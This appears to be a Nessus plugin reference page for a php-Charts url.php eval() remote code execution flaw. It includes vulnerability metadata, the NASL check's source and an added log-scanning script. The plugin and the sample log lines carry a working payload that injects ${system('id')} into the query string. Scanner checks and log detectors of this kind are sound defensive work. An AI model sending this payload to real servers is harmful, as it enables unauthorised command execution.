php-Charts url.php Remote PHP Code Execution - Nessus
High Plugin ID: 64557
This page contains detailed information about the php-Charts url.php Remote PHP Code Execution Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying this vulnerability.
Plugin Overview
ID: 64557
Name: php-Charts url.php Remote PHP Code Execution
Filename: php_charts_url_code_exec.nasl
Vulnerability Published: 2013-01-16
This Plugin Published: 2013-02-11
Last Modification Time: 2022-04-11
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, php_charts_detect.nasl
Required KB Items: www/php-charts
Vulnerability Information
Severity: High
Vulnerability Published: 2013-01-16
Patch Published: N/A
CVE: N/A
CPE: x-cpe:/a:php_charts:php_charts
Synopsis
The remote web server hosts an application that allows arbitrary PHP code execution.
Description
The php-Charts install hosted on the remote web server contains a flaw that could allow arbitrary PHP code execution. Input passed to the 'wizard/url.php' script is not properly sanitized before being used in a PHP eval() call. An unauthenticated, remote attacker could leverage this vulnerability to execute arbitrary PHP code on the remote host.
Solution
Unknown at this time.
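With no fix listed, requests to the affected script are worth hunting for in web-server logs. The following is an added example, not part of the Nessus plugin or the original page: it scans combined-format access-log lines for requests to wizard/url.php whose query string, after nested percent-encoding is undone, carries PHP code syntax of the kind the plugin's own check sends. The log lines, addresses and the type/width parameters are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log prefix: client, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
SCRIPT = "/wizard/url.php"  # script named in the plugin description
# PHP variable-interpolation syntax, call syntax, or backticks in the query.
CODE_MARKERS = re.compile(r"\$\{|\{\$|[A-Za-z_]\w*\s*\(|`")

def decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding so %2524%257B is seen as ${."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_probes(lines):
    """Return (client, status, decoded_query) for suspicious url.php hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        # Normalise case and duplicate slashes before matching the script path.
        path = re.sub(r"/+", "/", decode_fully(path)).lower()
        if SCRIPT not in path:
            continue
        query = decode_fully(query)
        if CODE_MARKERS.search(query):
            hits.append((m["client"], int(m["status"]), query))
    return hits

# Constructed sample log lines (documentation addresses, made-up parameters).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:01:22 +0000] "GET /php-charts/wizard/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Mar/2024:10:01:25 +0000] "GET /php-charts/wizard/url.php?type=bar&width=400 HTTP/1.1" 200 812',
    "198.51.100.7 - - [12/Mar/2024:10:04:02 +0000] \"GET /php-charts/wizard/url.php?${system('id')}=1 HTTP/1.1\" 200 312",
    '198.51.100.7 - - [12/Mar/2024:10:04:03 +0000] "GET /php-charts/wizard/url.php?%24%7Bsystem(%27ipconfig/all%27)%7D=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [12/Mar/2024:10:09:41 +0000] "GET /php-charts//Wizard/URL.php?%2524%257Bsystem(%2527id%2527)%257D=1 HTTP/1.1" 404 196',
]

if __name__ == "__main__":
    for client, status, query in find_probes(SAMPLE_LOG):
        print(f"{client} status={status} query={query!r}")
```

A hit with a 200 status deserves a closer look at the response size and at what the same client requested next; the call-syntax marker is deliberately broad and can flag legitimate values that contain parentheses.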
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the php-Charts url.php Remote PHP Code Execution vulnerability:
- Metasploit: exploit/unix/webapp/php_charts_exec [PHP-Charts v1.0 PHP Code Execution Vulnerability]
- Exploit-DB: exploits/php/webapps/24201.txt [EDB-24201: PHP-Charts - Arbitrary PHP Code Execution]
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS V2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:U/RC:ND
CVSS Base Score: 7.5 (High)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
CVSS Temporal Score: 7.1 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 7.1 (High)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:X
CVSS Base Score: 8.8 (High)
Impact Subscore: 5.9
Exploitability Subscore: 2.8
CVSS Temporal Score: 8.6 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 8.6 (High)
Plugin Source
This is the php_charts_url_code_exec.nasl nessus plugin source code. This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  script_id(64557);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
  script_bugtraq_id(57448);
  script_xref(name:"EDB-ID", value:"24201");
  script_name(english:"php-Charts url.php Remote PHP Code Execution");
  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary PHP
code execution.");
  script_set_attribute(attribute:"description", value:
"The php-Charts install hosted on the remote web server contains a flaw
that could allow arbitrary PHP code execution. Input passed to the
'wizard/url.php' script is not properly sanitized before being used in a
PHP eval() call. An unauthenticated, remote attacker could leverage
this vulnerability to execute arbitrary PHP code on the remote host.");
  # https://packetstormsecurity.com/files/119582/PHP-Chart-1.0-Code-Execution.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6e66577d");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:U/RC:X");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'PHP-Charts v1.0 PHP Code Execution Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"vuln_publication_date", value:"2013/01/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/11");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:php_charts:php_charts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_dependencies("php_charts_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("www/php-charts");
  script_require_ports("Services/www", 80);
  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(appname:'php-charts', port:port, exit_on_fail:TRUE);
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ('Windows' >< os)
    cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
  else
    cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
else
{
  cmds['ipconfig/all'] = 'Windows IP Configuration|IP(v[46])? Address[ .]+: ';
  cmds['id'] = 'uid=[0-9]+.*gid=[0-9]+.*';
}
foreach cmd (keys(cmds))
{
  output = "";
  url = install['dir']+"/wizard/url.php?${system('"+cmd+"')}=1";
  res = http_send_recv3(
    method : "GET",
    item : url,
    port : port,
    exit_on_fail:TRUE
  );
  body = res[2];
  if (!egrep(string:body, pattern:cmds[cmd])) continue;
  output = body;
  # Remove any leading PHP errors or HTML
  if ("ipconfig" >< cmd)
    output_starter = "Windows IP Config";
  else
    output_starter = "uid=";
  output = substr(output, stridx(output, output_starter));
  # Remove any trailing PHP errors or HTML
  if ("<" >< output)
  {
    html_start = stridx(output, "<");
    output = substr(output, 0, html_start - 1);
  }
  # Trim output if overly lengthy
  output = beginning_of_response(resp:output, max_lines:20);
  break;
}
if (output)
{
  if (report_verbosity > 0)
  {
    # Add request
    report =
      '\nNessus executed "' + cmd + '" by sending the following request :\n\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
      chomp(http_last_sent_request()) + '\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n';
    # Add command output
    if (report_verbosity > 1)
      report += '\nWhich resulted in the following command output :\n\n' + data_protection::sanitize_uid(output:output);
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else
{
  base_url = build_url(qs:install['dir']+'/', port:port);
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "php-Charts", base_url);
}
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix: /opt/nessus/lib/nessus/plugins/php_charts_url_code_exec.nasl
- Windows: C:\ProgramData\Tenable\Nessus\nessus\plugins\php_charts_url_code_exec.nasl
- Mac OS X: /Library/Nessus/run/lib/nessus/plugins/php_charts_url_code_exec.nasl
How to Run
Here is how to run the php-Charts url.php Remote PHP Code Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select php-Charts url.php Remote PHP Code Execution plugin ID 64557.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - php_charts_url_code_exec.nasl -t <IP/HOST>
Run the plugin using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state php_charts_url_code_exec.nasl -t <IP/HOST>
References
BID | SecurityFocus Bugtraq ID:
See also:
- https://www.tenable.com/plugins/nessus/64557
- http://www.nessus.org/u?6e66577d
- https://vulners.com/nessus/PHP_CHARTS_URL_CODE_EXEC.NASL
- 67174 - php-Charts wizard/index.php PHP Execution
- 35750 - PHP < 5.2.9 Multiple Vulnerabilities
- 41014 - PHP < 5.2.11 Multiple Vulnerabilities
- 42862 - PHP 5.3 < 5.3.1 Multiple Vulnerabilities
- 51139 - PHP 5.2 < 5.2.15 Multiple Vulnerabilities
- 51140 - PHP 5.3 < 5.3.4 Multiple Vulnerabilities
- 52717 - PHP 5.3 < 5.3.6 Multiple Vulnerabilities
- 55925 - PHP 5.3 < 5.3.7 Multiple Vulnerabilities
- 57537 - PHP < 5.3.9 Multiple Vulnerabilities
- 57557 - PHP Version 5 Hash Collision Form Parameter Parsing Remote DoS
- 58988 - PHP < 5.3.12 / 5.4.2 CGI Query String Code Execution
- 59056 - PHP 5.3.x < 5.3.13 CGI Query String Code Execution
- 59057 - PHP 5.4.x < 5.4.3 Multiple Vulnerabilities
- 59088 - PHP PHP-CGI Query String Parameter Injection Arbitrary Code Execution
- 59529 - PHP 5.3.x < 5.3.14 Multiple Vulnerabilities
- 59530 - PHP 5.4.x < 5.4.4 Multiple Vulnerabilities
- 60085 - PHP 5.3.x < 5.3.15 Multiple Vulnerabilities
- 60086 - PHP 5.4.x < 5.4.5 _php_stream_scandir Overflow
- 67259 - PHP 5.3.x < 5.3.27 Multiple Vulnerabilities
- 69348 - PHP 5.5.x < 5.5.1 xml.c Buffer Overflow
- 69401 - PHP 5.4.x < 5.4.19 Multiple Vulnerabilities
- 70728 - Apache PHP-CGI Remote Code Execution
- 71426 - PHP 5.3.x < 5.3.28 Multiple OpenSSL Vulnerabilities
- 71427 - PHP 5.4.x < 5.4.23 OpenSSL openssl_x509_parse() Memory Corruption
- 71428 - PHP 5.5.x < 5.5.7 OpenSSL openssl_x509_parse() Memory Corruption
- 76281 - PHP 5.4.x < 5.4.30 Multiple Vulnerabilities
- 76282 - PHP 5.5.x < 5.5.14 Multiple Vulnerabilities
- 77285 - PHP 5.3.x < 5.3.29 Multiple Vulnerabilities
- 77402 - PHP 5.4.x < 5.4.32 Multiple Vulnerabilities
- 77403 - PHP 5.5.x < 5.5.16 Multiple Vulnerabilities
- 78545 - PHP 5.4.x < 5.4.34 Multiple Vulnerabilities
- 78546 - PHP 5.5.x < 5.5.18 Multiple Vulnerabilities
- 78547 - PHP 5.6.x < 5.6.2 Multiple Vulnerabilities
- 78556 - PHP 5.6.0 Multiple Vulnerabilities
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file php_charts_url_code_exec.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.